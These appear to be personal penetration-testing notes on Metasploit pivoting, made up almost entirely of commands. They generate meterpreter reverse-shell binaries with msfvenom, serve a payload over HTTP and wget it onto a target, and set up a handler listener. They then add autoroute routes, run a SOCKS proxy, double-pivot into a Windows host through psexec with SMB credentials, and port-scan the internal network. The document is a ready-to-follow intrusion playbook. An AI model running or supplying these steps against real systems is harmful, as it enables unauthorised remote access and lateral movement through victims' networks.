Metasploit Pivoting

# Reverse Shell generation

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.2.149 LPORT=8080 -f elf --platform linux --arch x64 > reverse.elf

python -m http.server --bind 192.168.2.149

wget http://192.168.2.149:8000/reverse.elf

chmod u+x reverse.elf

# Setup listener

msfconsole -q

msf5 > use exploit/multi/handler

msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp

msf5 exploit(multi/handler) > run

# Autoroute module

msf5 > use post/multi/manage/autoroute

msf5 post(multi/manage/autoroute) > set SESSION 1

msf5 post(multi/manage/autoroute) > set CMD add

msf5 post(multi/manage/autoroute) > set SUBNET 10.42.42.0

msf5 post(multi/manage/autoroute) > set NETMASK /24

msf5 post(multi/manage/autoroute) > set CMD print

msf5 post(multi/manage/autoroute) > run

# On windows you can use post/windows/gather/arp_scanner to discover other machines

# On Linux you can try arp -a

# SOCKS proxy setup

msf5 > use auxiliary/server/socks4a

msf5 auxiliary(server/socks4a) > set SRVPORT 1081

msf5 auxiliary(server/socks4a) > run

# Now, equivalent to a dynamic SSH

# Double Pivoting

# Reverse shell from the pwned2 to the pwned1

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.42.42.1 LPORT=8088 -f exe --platform windows --arch x64 > reverse.exe

# Setup handler and exploit the found vulnerability

============================================================

MSFCONSOLE:

use exploit/windows/smb/psexec

set rhosts <first_network_ip>

set smbdomain <domain.local>

set smbpass <password>

set smbuser <user>

ser payload windows/x64/meterpreter/reverse_tcp

set lhost eth0

set target 2

run

after getting shell:

route print

ipconfig

arp -a > see the other network's IP this PC is talking to (is on a different NIC in-between *.1 and *.255 entries)

Hit CTRL+C and Y

from meterpreter:

run autoroute -s <new network/24>

run autoroute -p

background

search portscan

use 5 (tcp scan)

set rhosts <IP_in the new network>

set ports 445 (smb)